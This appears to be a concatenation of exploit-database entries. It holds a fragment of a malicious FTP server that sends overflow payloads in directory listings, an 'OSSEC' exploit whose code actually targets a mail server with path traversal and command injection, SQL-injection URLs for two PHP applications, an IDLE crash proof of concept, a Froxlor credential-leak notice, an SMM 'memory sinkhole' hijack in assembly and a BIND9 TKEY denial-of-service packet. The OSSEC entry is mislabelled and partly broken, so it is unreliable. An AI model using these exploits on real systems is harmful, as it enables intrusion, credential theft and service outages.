self.pasv_mode = True
self.servsock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.servsock.bind((local_ip,0))
self.servsock.listen(1)
ip, port = self.servsock.getsockname()
print 'open', ip, port
self.conn.send('227 Entering Passive Mode (%s,%u,%u).\r\n' %
(','.join(ip.split('.')), port>>8&0xFF, port&0xFF))
def start_datasock(self):
if self.pasv_mode:
self.datasock, addr = self.servsock.accept()
print 'connect:', addr
else:
self.datasock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.datasock.connect((self.dataAddr,self.dataPort))
def stop_datasock(self):
self.datasock.close()
if self.pasv_mode:
self.servsock.close()
def LIST(self,cmd):
self.conn.send('150 Here comes the directory listing.\r\n')
print 'list:', self.cwd
self.start_datasock()
dirlist = "drwxrwxrwx 1 100 0 11111 Jun 11 21:10" +buffer1+"\r\n\n"
dirlist += "-rw-rw-r-- 1 1176 1176 1060 Aug 16 22:22 "+buffer+" \r\n\n"
self.datasock.send("total 2\r\n"+dirlist)
self.stop_datasock()
self.conn.send('226 Directory send OK.\r\n')
def toListItem(self,fn):
st=os.stat(fn)
fullmode='rwxrwxrwx'
mode=''
for i in range(9):
mode+=((st.st_mode>>(8-i))&1) and fullmode[i] or '-'
d=(os.path.isdir(fn)) and 'd' or '-'
ftime=time.strftime(' %b %d %H:%M ', time.gmtime(st.st_mtime))
return d+mode+' 1 user group '+str(st.st_size)+ftime+os.path.basename(fn)
def MKD(self,cmd):
dn=os.path.join(self.cwd,cmd[4:-2])
os.mkdir(dn)
self.conn.send('257 Directory created.\r\n')
def RMD(self,cmd):
dn=os.path.join(self.cwd,cmd[4:-2])
if allow_delete:
os.rmdir(dn)
self.conn.send('250 Directory deleted.\r\n')
else:
self.conn.send('450 Not allowed.\r\n')
def DELE(self,cmd):
fn=os.path.join(self.cwd,cmd[5:-2])
if allow_delete:
os.remove(fn)
self.conn.send('250 File deleted.\r\n')
else:
self.conn.send('450 Not allowed.\r\n')
def RNFR(self,cmd):
self.rnfn=os.path.join(self.cwd,cmd[5:-2])
self.conn.send('350 Ready.\r\n')
def RNTO(self,cmd):
fn=os.path.join(self.cwd,cmd[5:-2])
os.rename(self.rnfn,fn)
self.conn.send('250 File renamed.\r\n')
def REST(self,cmd):
self.pos=int(cmd[5:-2])
self.rest=True
self.conn.send('250 File position reseted.\r\n')
def RETR(self,cmd):
fn=os.path.join(self.cwd,cmd[5:-2])
#fn=os.path.join(self.cwd,cmd[5:-2]).lstrip('/')
print 'Downlowding:',fn
if self.mode=='I':
fi=open(fn,'rb')
else:
fi=open(fn,'r')
self.conn.send('150 Opening data connection.\r\n')
if self.rest:
fi.seek(self.pos)
self.rest=False
data= fi.read(1024)
self.start_datasock()
while data:
self.datasock.send(data)
data=fi.read(1024)
fi.close()
self.stop_datasock()
self.conn.send('226 Transfer complete.\r\n')
def STOR(self,cmd):
fn=os.path.join(self.cwd,cmd[5:-2])
print 'Uplaoding:',fn
if self.mode=='I':
fo=open(fn,'wb')
else:
fo=open(fn,'w')
self.conn.send('150 Opening data connection.\r\n')
self.start_datasock()
while True:
data=self.datasock.recv(1024)
if not data: break
fo.write(data)
fo.close()
self.stop_datasock()
self.conn.send('226 Transfer complete.\r\n')
class FTPserver(threading.Thread):
def __init__(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind((local_ip,local_port))
threading.Thread.__init__(self)
def run(self):
self.sock.listen(5)
while True:
th=FTPserverThread(self.sock.accept())
th.daemon=True
th.start()
def stop(self):
self.sock.close()
if __name__=='__main__':
ftp=FTPserver()
ftp.daemon=True
ftp.start()
print 'On', local_ip, ':', local_port
raw_input('Enter to end...\n')
ftp.stop()
###########################################################
# Exploit Title: [OSSEC]
# Date: [2015-08-01]
# Exploit Author: [Milad Saber]
# Vendor Homepage: [www.ossec.net]
# Software Link: [www.ossec.net/files/ossec-wui-0.8.tar.gz]
# Version: [0.8]
# Tested on: [OSSEC Manager]
# Exploit for DOS ossec server.
# Please install ossec server and WUI 0.8 and run this exploit
##########################################################
import socket
import sys
import time
# specify payload
payload = '[ "$(id -u)" == "0" ] && touch /var/ossec/ossec.conf' # to exploit only on root
user = 'root'
pwd = 'var'
if len(sys.argv) != 2:
sys.stderr.write("[-]Usage: python %s <ip>\ossec-wui-0.8" % sys.argv[0])
sys.stderr.write("[-]Exemple: python %s 127.0.0.1\ossec-wui-0.8" % sys.argv[0])
sys.exit(1)
ip = sys.argv[1]
def recv(s):
s.recv(1024)
time.sleep(0.2)
try:
print "[+]Connecting to milad exploit ..."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,4555))
s.recv(1024)
s.send(user + "\n")
s.recv(1024)
s.send(pwd + "\n")
s.recv(1024)
print "[+]Creating user..."
s.send("adduser ../../../../../../../../var/ossec/ossec.conf exploit\n")
s.recv(1024)
s.send("quit\n")
s.close()
print "[+]Connecting to SMTP server..."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect((ip,25,80))
s.send("hello milad@milad.pl\r\n")
recv(s)
print "[+]Sending payload..."
s.send("mail from: <'@milad.pl>\r\n")
recv(s)
# also try s.send("rcpt to: <../../../../../../../../var/ossec/ossec.conf/r\n") if the recipient cannot be found
s.send("rcpt to: <../../../../../../../../var/ossec/ossec.conf\r\n")
recv(s)
s.send("data\r\n")
recv(s)
s.send("From: milad@milad.pl\r\n")
s.send("\r\n")
s.send("'\n")
s.send(payload + "\n")
s.send("\r\n.\r\n")
recv(s)
s.send("quit\r\n")
recv(s)
s.close()
print "[+]Done! Payload will be executed once somebody logs in."
except:
print "Connection failed."
# Exploit Title: PHP News Script 4.0.0 Sql Injection
# Date: 2015-08-01
# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
# Vendor Homepage: http://phpnewsscript.com/
# Version: 4.0.0
# Tested on: CentOS
Exploit :
http://server/allgallery.php?id=-9999%27+[sql-command]+%23
Test :
http://server/demo/allgallery.php?id=-100%27+union+select+user()%23
#!/usr/bin/env python
# Title : Python IDLE 2.7.8 - Crash Proof Of Concept
# Website : http://www.python.org/idle/
# Tested : Windows 7 / Windows 8.1
#
#
# Author : Hadi Zomorodi Monavar
# Email : zomorodihadi@gmail.com
#
# 1 . run python code : python poc.py
# 2 . open r3z4.txt and copy content to clipboard
# 3 . open "python 2.7.8 IDLE"
# 4 . from Menu (edit --> find)
# 5 . Paste ClipBoard on "find"
# 6 . Enter
# 7 . Crashed ;)
crash = "\x41"*900000 #B0F
file = open("r3z4.txt", "w")
file.write(crash)
file.close()
#------------------------------------------------------------------------------------------#
# Exploit Title: Froxlor Server Management Panel - MySQL Login Information Disclosure #
# Date: Jul 30 2015 #
# Exploit Author: Dustin Dörr #
# Vendor Homepage: https://www.froxlor.org/ #
# Version: <= 0.9.33.1 #
#------------------------------------------------------------------------------------------#
An unauthenticated remote attacker is able to get the Froxlor MySQL password and username
via webaccess due to wrong file permissions of the /logs/ folder in Froxlor version
0.9.33.1 and earlier. The plain MySQL password and username may be stored in the
/logs/sql-error.log file. This directory is publicly reachable by default.
some default URLs are:
- http://example.com/froxlor/logs/sql-error.log
- http://cp.example.com/logs/sql-error.log
- http://froxlor.example.com/logs/sql-error.log
the certain section looks like this:
/var/www/froxlor/lib/classes/database/class.Database.php(279):
PDO->__construct('mysql:host=127....', 'DATABASE_USER', 'DATABASE_PASSWORD', Array)
please note that the password in the logfile is truncated to 15 chars,
therefore passwords longer than 15 chars are not fully visible to an attacker.
; memory sinkhole proof of concept
; hijack ring -2 execution through the apic overlay attack.
; deployed in ring 0
; the SMBASE register of the core under attack
TARGET_SMBASE equ 0x1f5ef800
; the location of the attack GDT.
; this is determined by which register will be read out of the APIC
; for the GDT base. the APIC registers at this range are hardwired,
; and outside of our control; the SMM code will generally be reading
; from APIC registers in the 0xb00 range if the SMM handler is page
; aligned, or the 0x300 range if the SMM handler is not page aligned.
; the register will be 0 if the SMM handler is aligned to a page
; boundary, or 0x10000 if it is not.
GDT_ADDRESS equ 0x10000
; the value added to SMBASE by the SMM handler to compute the
; protected mode far jump offset. we could eliminate the need for an
; exact value with a nop sled in the hook.
FJMP_OFFSET equ 0x8097
; the offset of the SMM DSC structure from which the handler loads
; critical information
DSC_OFFSET equ 0xfb00
; the descriptor value used in the SMM handler’s far jump
DESCRIPTOR_ADDRESS equ 0x10
; MSR number for the APIC location
APIC_BASE_MSR equ 0x1b
; the target memory address to sinkhole
SINKHOLE equ ((TARGET_SMBASE+DSC_OFFSET)&0xfffff000)
; we will hijack the default SMM handler and point it to a payload
; at this physical address.
PAYLOAD_OFFSET equ 0x1000
; compute the desired base address of the CS descriptor in the GDT.
; this is calculated so that the fjmp performed in SMM is perfectly
; redirected to the payload hook at PAYLOAD_OFFSET.
CS_BASE equ (PAYLOAD_OFFSET-FJMP_OFFSET)
; we target the boot strap processor for hijacking.
APIC_BSP equ 0x100
; the APIC must be activated for the attack to work.
APIC_ACTIVE equ 0x800
;;; begin attack ;;;
; clear the processor caches,
; to prevent bypassing the memory sinkhole on data fetches
wbinvd
; construct a hijack GDT in memory under our control
; note: assume writing to identity mapped memory.
; if non-identity mapped, translate these through the page tables first.
mov dword [dword GDT_ADDRESS+DESCRIPTOR_ADDRESS+4],
(CS_BASE&0xff000000) | (0x00cf9a00) |
(CS_BASE&0x00ff0000)>>16
mov dword [dword GDT_ADDRESS+DESCRIPTOR_ADDRESS+0],
(CS_BASE&0x0000ffff)<<16 | 0xffff
; remap the APIC to sinkhole SMM’s DSC structure
mov eax, SINKHOLE | APIC_ACTIVE | APIC_BSP
mov edx, 0
mov ecx, APIC_BASE_MSR
wrmsr
; wait for a periodic SMI to be triggered
jmp $
#!/usr/bin/env python
# Exploit Title: PoC for BIND9 TKEY DoS
# Exploit Author: elceef
# Software Link: https://github.com/elceef/tkeypoc/
# Version: ISC BIND 9
# Tested on: multiple
# CVE : CVE-2015-5477
import socket
import sys
print('CVE-2015-5477 BIND9 TKEY PoC')
if len(sys.argv) < 2:
print('Usage: ' + sys.argv[0] + ' [target]')
sys.exit(1)
print('Sending packet to ' + sys.argv[1] + ' ...')
payload = bytearray('4d 55 01 00 00 01 00 00 00 00 00 01 03 41 41 41 03 41 41 41 00 00 f9 00 ff 03 41 41 41 03 41 41 41 00 00 0a 00 ff 00 00 00 00 00 09 08 41 41 41 41 41 41 41 41'.replace(' ', '').decode('hex'))
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(payload, (sys.argv[1], 53))
print('Done.')
source: https://www.securityfocus.com/bid/55386/info
Sitemax Maestro is prone to SQL-injection and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker can exploit these vulnerabilities to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, use directory-traversal strings to execute local script code in the context of the application, or obtain sensitive information that may aid in further attacks.
Sitemax Maestro 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/pages.php?al=100000000000000000000000000' or (select floor(rand(0)*2) from(select count(*),concat((select concat(user_name,0x7c,user_password) from sed_users limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)-- AND 1='1
http://www.example.com/swlang.php?lang=../../datas/users/file.gif%00&redirect=